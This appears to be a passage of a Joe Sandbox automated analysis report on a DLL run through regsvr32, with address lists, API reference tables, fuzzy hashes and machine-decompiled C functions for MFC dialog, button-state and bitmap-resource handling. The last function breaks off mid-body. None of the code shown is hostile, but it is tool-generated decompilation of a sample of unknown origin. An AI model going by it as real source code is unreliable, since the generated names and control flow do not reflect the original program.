                                                                                                                0x10013c16
                                                                                                                0x10013c19
                                                                                                                0x10013c1b
                                                                                                                0x10013c20
                                                                                                                0x10013c21
                                                                                                                0x10013c23
                                                                                                                0x10013c23
                                                                                                                0x10013c35
                                                                                                                0x10013c39
                                                                                                                0x10013c39
                                                                                                                0x10013c3e
                                                                                                                0x10013c41
                                                                                                                0x10013c43
                                                                                                                0x10013c49
                                                                                                                0x10013c4b
                                                                                                                0x10013c4d
                                                                                                                0x10013c52
                                                                                                                0x10013c53
                                                                                                                0x10013c55
                                                                                                                0x10013c55
                                                                                                                0x10013c62
                                                                                                                0x10013c66
                                                                                                                0x10013c66
                                                                                                                0x10013c6e
                                                                                                                0x10013c70
                                                                                                                0x10013c76
                                                                                                                0x10013c78
                                                                                                                0x10013c7b
                                                                                                                0x10013c80
                                                                                                                0x10013c81
                                                                                                                0x10013c83
                                                                                                                0x10013c83
                                                                                                                0x10013c90
                                                                                                                0x10013c94
                                                                                                                0x10013c94
                                                                                                                0x10013c9c
                                                                                                                0x10013ca0
                                                                                                                0x10013ca2
                                                                                                                0x10013ca8
                                                                                                                0x10013caa
                                                                                                                0x10013cac
                                                                                                                0x10013cb1
                                                                                                                0x10013cb2
                                                                                                                0x10013cb4
                                                                                                                0x10013cb4
                                                                                                                0x10013cc1
                                                                                                                0x10013cc5
                                                                                                                0x10013cc5
                                                                                                                0x10013cd1
                                                                                                                0x10013cd3
                                                                                                                0x10013cd9
                                                                                                                0x10013cdb
                                                                                                                0x10013cde
                                                                                                                0x10013ce3
                                                                                                                0x10013ce4
                                                                                                                0x10013ce6
                                                                                                                0x10013ce6
                                                                                                                0x10013cf3
                                                                                                                0x10013cf7
                                                                                                                0x10013cf7
                                                                                                                0x10013d03
                                                                                                                0x10013d05
                                                                                                                0x10013d0b
                                                                                                                0x10013d0d
                                                                                                                0x10013d10
                                                                                                                0x10013d15
                                                                                                                0x10013d16
                                                                                                                0x10013d18
                                                                                                                0x10013d18
                                                                                                                0x10013d20
                                                                                                                0x10013d25
                                                                                                                0x10013d29
                                                                                                                0x10013d29
                                                                                                                0x10013d35
                                                                                                                0x10013d37
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10013BA3
                                                                                                                • SendMessageA.USER32 ref: 10013BB9
                                                                                                                • SendMessageA.USER32 ref: 10013BCF
                                                                                                                • SendMessageA.USER32 ref: 10013BE5
                                                                                                                • SendMessageA.USER32 ref: 10013BFB
                                                                                                                • SendMessageA.USER32 ref: 10013C0F
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                • SendMessageA.USER32 ref: 10013D8D
                                                                                                                • SendMessageA.USER32 ref: 10013DD4
                                                                                                                • SendMessageA.USER32 ref: 10013E1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: 157d5ab14b1915a755776daee1e558eafc96f736756881f77cd98053afb0d79f
                                                                                                                • Instruction ID: 370f625acc105a2332efca686d67762992661e93f86ca447c21c6986cb934f32
                                                                                                                • Opcode Fuzzy Hash: 157d5ab14b1915a755776daee1e558eafc96f736756881f77cd98053afb0d79f
                                                                                                                • Instruction Fuzzy Hash: 1FD15275740B02AFE224CF65D892F66B3E5EF48724F00861CF24A9BA91CB74F885CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003548B(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				void* _t40;
                                                                                                                				int _t46;
                                                                                                                				void* _t51;
                                                                                                                				intOrPtr _t52;
                                                                                                                				signed int _t58;
                                                                                                                				signed int* _t66;
                                                                                                                				void* _t67;
                                                                                                                				signed int _t68;
                                                                                                                				signed int _t70;
                                                                                                                
                                                                                                                				_t51 = __ebx;
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_push(_t67);
                                                                                                                					_push(0x100172b8);
                                                                                                                					_t54 = 0x10070af4;
                                                                                                                					_t68 = E1002D69C(__ebx, 0x10070af4, 0, _t67, __eflags);
                                                                                                                					__eflags = _t68;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						E1001729E(__ebx, 0x10070af4, 0, _t68, __eflags);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t68 + 0x18);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = E10019C3D(_t54, 0, _t68, __eflags, _a4);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t54 =  *(_t68 + 0x18);
                                                                                                                							E1001A7FD( *(_t68 + 0x18), __eflags, _a4);
                                                                                                                							 *(_t68 + 0x18) = 0;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(_t51);
                                                                                                                					_t52 = _a8;
                                                                                                                					__eflags = _t52 - 0x110;
                                                                                                                					if(_t52 != 0x110) {
                                                                                                                						__eflags = _t52 -  *0x10070f10; // 0x0
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L25:
                                                                                                                							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                                                                							_t31 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						__eflags = _t52 - 0x111;
                                                                                                                						if(_t52 != 0x111) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t52 - 0xc000;
                                                                                                                							if(__eflags < 0) {
                                                                                                                								L22:
                                                                                                                								_t31 = 0;
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t70 = E10019C3D(_t54, 0x110, _t68, __eflags, _a4);
                                                                                                                							__eflags = _t70;
                                                                                                                							if(_t70 == 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							_t33 = E1001EFEF(_t70, 0x1005b358);
                                                                                                                							__eflags = _t33;
                                                                                                                							if(_t33 == 0) {
                                                                                                                								L16:
                                                                                                                								__eflags = _t52 -  *0x10070f04; // 0x0
                                                                                                                								if(__eflags != 0) {
                                                                                                                									__eflags = _t52 -  *0x10070f08; // 0x0
                                                                                                                									if(__eflags != 0) {
                                                                                                                										__eflags = _t52 -  *0x10070f00; // 0x0
                                                                                                                										if(__eflags != 0) {
                                                                                                                											__eflags = _t52 -  *0x10070f0c; // 0x0
                                                                                                                											if(__eflags != 0) {
                                                                                                                												goto L22;
                                                                                                                											}
                                                                                                                											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
                                                                                                                											goto L26;
                                                                                                                										}
                                                                                                                										_t58 = _a16 >> 0x10;
                                                                                                                										__eflags = _t58;
                                                                                                                										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
                                                                                                                										goto L22;
                                                                                                                									}
                                                                                                                									_t19 = _t70 + 0x1c4; // 0x1c4
                                                                                                                									_t66 = _t19;
                                                                                                                									 *_t66 = _a16;
                                                                                                                									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
                                                                                                                									 *_t66 =  *_t66 & 0x00000000;
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t40 = E10021B38(_t70);
                                                                                                                							__eflags =  *(_t40 + 0x34) & 0x00080000;
                                                                                                                							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                                                                                                                								goto L22;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						__eflags = _a12 - 0x40e;
                                                                                                                						if(_a12 == 0x40e) {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					} else {
                                                                                                                						 *0x10070f00 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                                                                                                                						 *0x10070f04 = RegisterClipboardFormatA("commdlg_ShareViolation");
                                                                                                                						 *0x10070f08 = RegisterClipboardFormatA("commdlg_FileNameOK");
                                                                                                                						 *0x10070f0c = RegisterClipboardFormatA("commdlg_ColorOK");
                                                                                                                						 *0x10070f10 = RegisterClipboardFormatA("commdlg_help");
                                                                                                                						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                                                                                                                						_push(_a16);
                                                                                                                						 *0x10070f14 = _t46;
                                                                                                                						_push(_a12);
                                                                                                                						_t31 = E10020C3C(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
                                                                                                                						L26:
                                                                                                                						return _t31;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 100354EF
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 100354FB
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 10035507
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 10035513
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1003551F
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1003552B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                • API String ID: 1228543026-3888057576
                                                                                                                • Opcode ID: 17f688779c176c994b3563f396b24f7a16039125b43958598f7d2d1c9b039bb8
                                                                                                                • Instruction ID: c015fbd86c2365627cfa4c6b6d3805c6aa78604190f57317838502c5f4154117
                                                                                                                • Opcode Fuzzy Hash: 17f688779c176c994b3563f396b24f7a16039125b43958598f7d2d1c9b039bb8
                                                                                                                • Instruction Fuzzy Hash: EC418F34500655DFDB22DF20CC999AE3BF1EB44353F114A26F8859B261D736E981CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10013420(void* __ebx, void* __ecx, long _a4) {
                                                                                                                				long _v4;
                                                                                                                				long _v8;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char _t119;
                                                                                                                				int* _t120;
                                                                                                                				int* _t121;
                                                                                                                				int* _t125;
                                                                                                                				int* _t126;
                                                                                                                				int* _t130;
                                                                                                                				int* _t131;
                                                                                                                				int* _t135;
                                                                                                                				int* _t136;
                                                                                                                				int* _t140;
                                                                                                                				int* _t141;
                                                                                                                				long _t145;
                                                                                                                				long _t182;
                                                                                                                				signed char _t186;
                                                                                                                				int* _t190;
                                                                                                                				int _t203;
                                                                                                                				intOrPtr _t208;
                                                                                                                				intOrPtr _t210;
                                                                                                                				intOrPtr _t212;
                                                                                                                				intOrPtr _t214;
                                                                                                                				intOrPtr _t216;
                                                                                                                				signed char _t235;
                                                                                                                				signed char _t243;
                                                                                                                				void* _t251;
                                                                                                                				signed char _t262;
                                                                                                                				signed char _t267;
                                                                                                                				void* _t272;
                                                                                                                				int _t273;
                                                                                                                				long _t274;
                                                                                                                
                                                                                                                				_t202 = __ebx;
                                                                                                                				_t274 = _a4;
                                                                                                                				_t119 =  *(_t274 + 0x18);
                                                                                                                				_t272 = __ecx;
                                                                                                                				if(( !_t119 & 0x00000001) == 0) {
                                                                                                                					__eflags = _t119 & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(__ebx, _t251, __ecx, _t274, __eflags);
                                                                                                                					}
                                                                                                                					_t120 =  *(_t274 + 0x28);
                                                                                                                					_t208 =  *((intOrPtr*)(_t274 + 0x2c));
                                                                                                                					_t252 =  &(_t120[1]);
                                                                                                                					__eflags =  &(_t120[1]) - _t208;
                                                                                                                					if( &(_t120[1]) > _t208) {
                                                                                                                						__eflags = _t120 - _t208 + 4;
                                                                                                                						E1001FADC(_t274, _t252, _t120 - _t208 + 4);
                                                                                                                					}
                                                                                                                					_t121 =  *(_t274 + 0x28);
                                                                                                                					 *(_t274 + 0x28) =  &(_t121[1]);
                                                                                                                					SendMessageA( *(_t272 + 0x1f8), 0xf1,  *_t121, 0);
                                                                                                                					__eflags =  *(_t274 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t202, _t252, _t272, _t274, __eflags);
                                                                                                                					}
                                                                                                                					_t125 =  *(_t274 + 0x28);
                                                                                                                					_t210 =  *((intOrPtr*)(_t274 + 0x2c));
                                                                                                                					_t253 =  &(_t125[1]);
                                                                                                                					__eflags =  &(_t125[1]) - _t210;
                                                                                                                					if( &(_t125[1]) > _t210) {
                                                                                                                						__eflags = _t125 - _t210 + 4;
                                                                                                                						E1001FADC(_t274, _t253, _t125 - _t210 + 4);
                                                                                                                					}
                                                                                                                					_t126 =  *(_t274 + 0x28);
                                                                                                                					 *(_t274 + 0x28) =  &(_t126[1]);
                                                                                                                					SendMessageA( *(_t272 + 0x1a4), 0xf1,  *_t126, 0);
                                                                                                                					__eflags =  *(_t274 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t202, _t253, _t272, _t274, __eflags);
                                                                                                                					}
                                                                                                                					_t130 =  *(_t274 + 0x28);
                                                                                                                					_t212 =  *((intOrPtr*)(_t274 + 0x2c));
                                                                                                                					_t254 =  &(_t130[1]);
                                                                                                                					__eflags =  &(_t130[1]) - _t212;
                                                                                                                					if( &(_t130[1]) > _t212) {
                                                                                                                						__eflags = _t130 - _t212 + 4;
                                                                                                                						E1001FADC(_t274, _t254, _t130 - _t212 + 4);
                                                                                                                					}
                                                                                                                					_t131 =  *(_t274 + 0x28);
                                                                                                                					 *(_t274 + 0x28) =  &(_t131[1]);
                                                                                                                					SendMessageA( *(_t272 + 0x150), 0xf1,  *_t131, 0);
                                                                                                                					__eflags =  *(_t274 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t202, _t254, _t272, _t274, __eflags);
                                                                                                                					}
                                                                                                                					_t135 =  *(_t274 + 0x28);
                                                                                                                					_t214 =  *((intOrPtr*)(_t274 + 0x2c));
                                                                                                                					_t255 =  &(_t135[1]);
                                                                                                                					__eflags =  &(_t135[1]) - _t214;
                                                                                                                					if( &(_t135[1]) > _t214) {
                                                                                                                						__eflags = _t135 - _t214 + 4;
                                                                                                                						E1001FADC(_t274, _t255, _t135 - _t214 + 4);
                                                                                                                					}
                                                                                                                					_t136 =  *(_t274 + 0x28);
                                                                                                                					 *(_t274 + 0x28) =  &(_t136[1]);
                                                                                                                					SendMessageA( *(_t272 + 0xfc), 0xf1,  *_t136, 0);
                                                                                                                					__eflags =  *(_t274 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t202, _t255, _t272, _t274, __eflags);
                                                                                                                					}
                                                                                                                					_t140 =  *(_t274 + 0x28);
                                                                                                                					_t216 =  *((intOrPtr*)(_t274 + 0x2c));
                                                                                                                					_t256 =  &(_t140[1]);
                                                                                                                					__eflags =  &(_t140[1]) - _t216;
                                                                                                                					if( &(_t140[1]) > _t216) {
                                                                                                                						__eflags = _t140 - _t216 + 4;
                                                                                                                						E1001FADC(_t274, _t256, _t140 - _t216 + 4);
                                                                                                                					}
                                                                                                                					_t141 =  *(_t274 + 0x28);
                                                                                                                					 *(_t274 + 0x28) =  &(_t141[1]);
                                                                                                                					SendMessageA( *(_t272 + 0xa8), 0xf1,  *_t141, 0);
                                                                                                                					_t145 = SendMessageA( *(_t272 + 0x1f8), 0xf0, 0, 0);
                                                                                                                					__eflags = _t145;
                                                                                                                					if(_t145 != 0) {
                                                                                                                						return _t145;
                                                                                                                					} else {
                                                                                                                						E1001D39A(_t272 + 0x184, _t145);
                                                                                                                						E1001D39A(_t272 + 0x130, 0);
                                                                                                                						E1001D39A(_t272 + 0xdc, 0);
                                                                                                                						E1001D39A(_t272 + 0x88, 0);
                                                                                                                						SendMessageA( *(_t272 + 0x1a4), 0xf1, 0, 0);
                                                                                                                						SendMessageA( *(_t272 + 0x150), 0xf1, 0, 0);
                                                                                                                						SendMessageA( *(_t272 + 0xfc), 0xf1, 0, 0);
                                                                                                                						return SendMessageA( *(_t272 + 0xa8), 0xf1, 0, 0);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_push(__ebx);
                                                                                                                				_v4 = SendMessageA( *(__ecx + 0xa8), 0xf0, 0, 0);
                                                                                                                				_v8 = SendMessageA( *(_t272 + 0xfc), 0xf0, 0, 0);
                                                                                                                				_a4 = SendMessageA( *(_t272 + 0x150), 0xf0, 0, 0);
                                                                                                                				_t203 = SendMessageA( *(_t272 + 0x1a4), 0xf0, 0, 0);
                                                                                                                				_t182 = SendMessageA( *(_t272 + 0x1f8), 0xf0, 0, 0);
                                                                                                                				_t235 =  !( *(_t274 + 0x18));
                                                                                                                				_t280 = _t235 & 0x00000001;
                                                                                                                				_t273 = _t182;
                                                                                                                				if((_t235 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t203,  *((intOrPtr*)(_t274 + 0x14)), _t273, _t274, _t280);
                                                                                                                				}
                                                                                                                				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
                                                                                                                					E1001FA65(_t274);
                                                                                                                				}
                                                                                                                				 *( *(_t274 + 0x28)) = _t273;
                                                                                                                				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				_t262 =  !( *(_t274 + 0x18));
                                                                                                                				_t282 = _t262 & 0x00000001;
                                                                                                                				if((_t262 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t203, _t262, _t273, _t274, _t282);
                                                                                                                				}
                                                                                                                				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
                                                                                                                					E1001FA65(_t274);
                                                                                                                				}
                                                                                                                				_t263 =  *(_t274 + 0x28);
                                                                                                                				 *( *(_t274 + 0x28)) = _t203;
                                                                                                                				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				_t186 =  !( *(_t274 + 0x18));
                                                                                                                				_t284 = _t186 & 0x00000001;
                                                                                                                				if((_t186 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t203, _t263, _t273, _t274, _t284);
                                                                                                                				}
                                                                                                                				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
                                                                                                                					E1001FA65(_t274);
                                                                                                                				}
                                                                                                                				 *( *(_t274 + 0x28)) = _a4;
                                                                                                                				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				_t267 =  !( *(_t274 + 0x18));
                                                                                                                				_t286 = _t267 & 0x00000001;
                                                                                                                				if((_t267 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t203, _t267, _t273, _t274, _t286);
                                                                                                                				}
                                                                                                                				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
                                                                                                                					E1001FA65(_t274);
                                                                                                                				}
                                                                                                                				 *( *(_t274 + 0x28)) = _v8;
                                                                                                                				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				_t243 =  !( *(_t274 + 0x18));
                                                                                                                				_t288 = _t243 & 0x00000001;
                                                                                                                				if((_t243 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t274 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t203,  *((intOrPtr*)(_t274 + 0x14)), _t273, _t274, _t288);
                                                                                                                				}
                                                                                                                				_t190 =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				if(_t190 >  *((intOrPtr*)(_t274 + 0x2c))) {
                                                                                                                					_t190 = E1001FA65(_t274);
                                                                                                                				}
                                                                                                                				 *( *(_t274 + 0x28)) = _v4;
                                                                                                                				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
                                                                                                                				return _t190;
                                                                                                                			}





































                                                                                                                0x10013697
                                                                                                                0x1001369a
                                                                                                                0x1001369d
                                                                                                                0x100136a0
                                                                                                                0x100136a2
                                                                                                                0x100136a6
                                                                                                                0x100136ac
                                                                                                                0x100136ac
                                                                                                                0x100136b1
                                                                                                                0x100136bc
                                                                                                                0x100136cb
                                                                                                                0x100136cd
                                                                                                                0x100136d1
                                                                                                                0x100136d6
                                                                                                                0x100136d7
                                                                                                                0x100136d9
                                                                                                                0x100136d9
                                                                                                                0x100136de
                                                                                                                0x100136e1
                                                                                                                0x100136e4
                                                                                                                0x100136e7
                                                                                                                0x100136e9
                                                                                                                0x100136ed
                                                                                                                0x100136f3
                                                                                                                0x100136f3
                                                                                                                0x100136f8
                                                                                                                0x10013703
                                                                                                                0x10013712
                                                                                                                0x10013724
                                                                                                                0x10013726
                                                                                                                0x10013728
                                                                                                                0x100135aa
                                                                                                                0x1001372e
                                                                                                                0x10013735
                                                                                                                0x10013742
                                                                                                                0x1001374f
                                                                                                                0x1001375c
                                                                                                                0x10013771
                                                                                                                0x10013783
                                                                                                                0x10013795
                                                                                                                0x100137af
                                                                                                                0x100137af
                                                                                                                0x10013728
                                                                                                                0x10013448
                                                                                                                0x10013459
                                                                                                                0x1001347b
                                                                                                                0x10013491
                                                                                                                0x1001349b
                                                                                                                0x100134a9
                                                                                                                0x100134ae
                                                                                                                0x100134b0
                                                                                                                0x100134b3
                                                                                                                0x100134b5
                                                                                                                0x100134ba
                                                                                                                0x100134bb
                                                                                                                0x100134bd
                                                                                                                0x100134bd
                                                                                                                0x100134cf
                                                                                                                0x100134d3
                                                                                                                0x100134d3
                                                                                                                0x100134db
                                                                                                                0x100134dd
                                                                                                                0x100134e3
                                                                                                                0x100134e5
                                                                                                                0x100134e8
                                                                                                                0x100134ed
                                                                                                                0x100134ee
                                                                                                                0x100134f0
                                                                                                                0x100134f0
                                                                                                                0x100134fd
                                                                                                                0x10013501
                                                                                                                0x10013501
                                                                                                                0x10013506
                                                                                                                0x10013509
                                                                                                                0x1001350b
                                                                                                                0x10013511
                                                                                                                0x10013513
                                                                                                                0x10013515
                                                                                                                0x1001351a
                                                                                                                0x1001351b
                                                                                                                0x1001351d
                                                                                                                0x1001351d
                                                                                                                0x1001352a
                                                                                                                0x1001352e
                                                                                                                0x1001352e
                                                                                                                0x1001353a
                                                                                                                0x1001353c
                                                                                                                0x10013542
                                                                                                                0x10013544
                                                                                                                0x10013547
                                                                                                                0x1001354c
                                                                                                                0x1001354d
                                                                                                                0x1001354f
                                                                                                                0x1001354f
                                                                                                                0x1001355c
                                                                                                                0x10013560
                                                                                                                0x10013560
                                                                                                                0x1001356c
                                                                                                                0x1001356e
                                                                                                                0x10013574
                                                                                                                0x10013576
                                                                                                                0x10013579
                                                                                                                0x1001357e
                                                                                                                0x1001357f
                                                                                                                0x10013581
                                                                                                                0x10013581
                                                                                                                0x10013589
                                                                                                                0x1001358e
                                                                                                                0x10013592
                                                                                                                0x10013592
                                                                                                                0x1001359e
                                                                                                                0x100135a0
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: 0dd4ed08de290f0c4f048feb9336a23b642ca1fbbea8fc62d2901632797989bf
                                                                                                                • Instruction ID: 34949a1f51b268de1e30d8a8dc99c9b2a9e649bb9d1172762ed38599e44b00d1
                                                                                                                • Opcode Fuzzy Hash: 0dd4ed08de290f0c4f048feb9336a23b642ca1fbbea8fc62d2901632797989bf
                                                                                                                • Instruction Fuzzy Hash: 58B17375740B02AFE324DF65CC92F66B3E5EF48B14F00861CF24A9BA81CA74F8858B55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10026F51(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t63;
                                                                                                                				struct HDC__* _t64;
                                                                                                                				struct HBITMAP__* _t65;
                                                                                                                				struct HDC__* _t69;
                                                                                                                				void* _t76;
                                                                                                                				struct HDC__* _t79;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				void* _t91;
                                                                                                                				signed int _t92;
                                                                                                                				intOrPtr _t100;
                                                                                                                				int* _t101;
                                                                                                                				int _t102;
                                                                                                                				void* _t103;
                                                                                                                				BITMAPINFO* _t104;
                                                                                                                				void* _t106;
                                                                                                                
                                                                                                                				_t52 = LoadResource(_a4, _a8);
                                                                                                                				_v20 = _t52;
                                                                                                                				if(_t52 == 0) {
                                                                                                                					return _t52;
                                                                                                                				}
                                                                                                                				_t53 = LockResource(_t52);
                                                                                                                				_t76 = _t53;
                                                                                                                				_v16 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					L17:
                                                                                                                					return _t53;
                                                                                                                				}
                                                                                                                				_push(_t103);
                                                                                                                				_t98 =  *_t76 + 0x40;
                                                                                                                				_t53 = E1003B4DA(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
                                                                                                                				_t104 = _t53;
                                                                                                                				if(_t104 == 0) {
                                                                                                                					L16:
                                                                                                                					goto L17;
                                                                                                                				} else {
                                                                                                                					E100161B4(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
                                                                                                                					_t56 = _t104 + _t104->bmiHeader;
                                                                                                                					_a8 = _a8 & 0x00000000;
                                                                                                                					_v12 = _t56;
                                                                                                                					do {
                                                                                                                						_t82 = _t56 + _a8 * 4;
                                                                                                                						_t100 =  *_t82;
                                                                                                                						_t92 = 0;
                                                                                                                						_v8 = _t82;
                                                                                                                						while(_t100 !=  *((intOrPtr*)(0x1005c024 + _t92 * 8))) {
                                                                                                                							_t92 = _t92 + 1;
                                                                                                                							if(_t92 < 4) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _a12;
                                                                                                                						if(_a12 == 0) {
                                                                                                                							_t101 = 0x1005c028 + _t92 * 8;
